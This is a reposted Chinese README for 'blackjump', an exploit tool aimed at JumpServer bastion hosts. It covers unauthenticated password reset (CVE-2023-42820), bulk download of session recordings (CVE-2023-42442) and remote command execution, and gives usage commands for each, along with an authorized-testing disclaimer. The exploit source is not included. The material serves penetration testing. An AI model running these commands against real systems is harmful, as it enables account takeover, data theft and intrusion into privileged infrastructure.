admin管理员组文章数量:1794759
JumpServer堡垒机漏洞利用工具集
项目介绍
JumpServer 堡垒机综合漏洞利用
- 未授权任意用户密码重置 (CVE-2023-42820)
- 未授权一键下载所有操作录像 (CVE-2023-42442)
- 未授权任意命令执行漏洞 (RCE 2021)
依赖安装
代码语言:javascript代码运行次数:0运行复制python3 -m pip install -r requirements.txt
使用指南
CVE-2023-42820: 如果知道目标的用户名和邮箱可以指定--user
和 --email
参数
python3 blackjump.py reset https://vulerability
CVE-2023-42442: output/
目录下的 <uuid4>.tar
文件扔进 jumpserver播放器播放即可
python3 blackjump.py dump https://vulerability
远程命令执行:
代码语言:javascript代码运行次数:0运行复制python3 blackjump.py rce http(s)://vulerability
帮助信息:
代码语言:javascript代码运行次数:0运行复制python3 blackjump.py {reset,dump,rce} -h
免责声明
请勿从事非法测试,利用此工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该仅供安全人员用于授权测试,请勿非法使用!!!
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。原始发表:2024-10-17,如有侵权请联系 cloudcommunity@tencent 删除安全python3测试工具漏洞本文标签: JumpServer堡垒机漏洞利用工具集
版权声明:本文标题:JumpServer堡垒机漏洞利用工具集 内容由林淑君副主任自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.xiehuijuan.com/baike/1754727133a1705675.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论